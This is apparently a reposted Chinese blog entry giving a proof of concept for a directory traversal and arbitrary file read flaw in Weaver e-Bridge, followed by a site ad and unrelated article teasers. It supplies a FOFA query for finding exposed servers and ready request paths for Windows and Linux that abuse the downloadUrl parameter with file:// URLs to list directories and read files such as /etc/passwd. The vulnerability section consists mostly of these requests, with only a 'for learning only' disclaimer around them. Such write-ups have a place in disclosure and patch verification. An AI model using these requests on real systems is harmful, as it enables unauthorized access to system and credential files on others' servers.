泛微云桥e-Bridge 目录遍历,任意文件读取

摘要:
01影响版本2018-2019多个版本。02fofa语法泛微云桥03漏洞复现如果使用POC回显"无法验证您的身份!"证明改漏洞已被修复POC中,当downloadUrl的路径为文件夹的时候结果为目录遍历linuxwindows通用WindowsPOC:/wxjsapi/saveYZJFile?

01 影响版本

2018-2019 多个版本。

02 fofa语法

泛微云桥

03 漏洞复现

如果使用POC回显"无法验证您的身份!"证明改漏洞已被修复
POC中,当downloadUrl的路径为文件夹的时候结果为目录遍历 linux windows 通用
Windows POC:

/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt #查看页面中的id值

泛微云桥e-Bridge 目录遍历,任意文件读取第1张

/file/fileNoLogin/<id> #访问文件接口,根据上一步获取的id对文件内容进行读取

泛微云桥e-Bridge 目录遍历,任意文件读取第2张

如果提示msg "/C: (No such file or directory)" 就表示为Linux系统(表示不存在C盘)
Linux POC:

/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt
/file/fileNoLogin/<id> #访问文件接口,根据上一步获取的id对文件内容进行读取

04 实例

Linux系统主目录(根目录)
泛微云桥e-Bridge 目录遍历,任意文件读取第3张
Linux中/ect/passwd文件
泛微云桥e-Bridge 目录遍历,任意文件读取第4张

免责声明:文章转载自《泛微云桥e-Bridge 目录遍历,任意文件读取》仅用于学习参考。如对内容有疑问,请及时联系本站处理。

上篇php连接sql server的五种方法小结关于Android中so解析那些事下篇

宿迁高防,2C2G15M,22元/月;香港BGP,2C5G5M,25元/月 雨云优惠码:MjYwNzM=

相关文章

TP5 多入口文件配置的坑

闲话不多说,TP5(5.0.20) 在配置多入口文件的时候你是否遇到过一下的问题呢? 开发设计的需求吧网站拆分为前台、后台、API 3 个模块,对应的也需要3个入口文件,后台和API入口文件是用PATH_INFO 模式访问(关闭路由)。 在配置后台入口文件的时候,直接从前台入口文件拷贝了主要代码如下 <?php // [ 后台应用入口文件 ] //...

composer 安装laravel

1、简介 Laravel是一套简洁,优雅的PHP WEB开发框架(PHP Web Framework)。 laravel是目前一个比较主流的框架,现在很多互联网的公司基本都在使用该框架。该框架是基于symfony【国外一款非常流行的框架:由于国内手册不是很齐全,没有多少公司使用】的一个国外的MVC框架。诞生于2011年6月11日。 官网:https://l...

Linux系统学习 九、日志、命令、身份鉴别、目录、文件查看、控制台终端、文件属性

一、配置静态IP地址 输入ifconfig后没有配置IP地址,接下来进行手动配置。 输入以下命令进入IP配置文件进行配置 原始内容 进入vi后,输入i进入编辑状态,编辑完成后,按esc键退出编辑状态,输入:wq进行保存退出。 编辑后的内容 重新启动一下 遇到的问题: IP配置完成,重启后,可以和本机ping通,但是无法ping通百度。 原因...

nginx上传模块—nginx upload module-

一. nginx upload module原理 官方文档: http://www.grid.net.ru/nginx/upload.en.html Nginx upload module通过nginx服务来接受用户上传的文件,自动解析请求体中存储的所有文件上传到upload_store指定的目录下。这些文件信息从原始请求体中分离并根据nginx.conf...

CentOS搭建Git服务器及权限管理

https://www.cnblogs.com/fly_dragon/p/8718614.html 声明:本教程,仅作为配置的记录,细节不展开,需要您有一点linux的命令基础,仅作为配置参考。 1. 系统环境 系统: Linux:CentOS 7.2 64位 由于CentOS已经内置了OpenSSH,如果您的系统没有,请自行安装。 查看ssh版本 $s...

linux内核之文件系统

本文主要是基于百度文库的《Linux2.4.30内核文件系统学习(多图).doc》和360doc的《Linux内核虚拟文件系统》修改而来,当然还参考了其他的一些文档,在此就不一一列出了。本来在看到这些文章后,都没有勇气再写点文件系统方面的东西了,这些文章实在太精彩了。最后还是鼓足勇气决定把整理的资料增加了一点自己的理解写下来,主要目的是让各位高手看看我的理...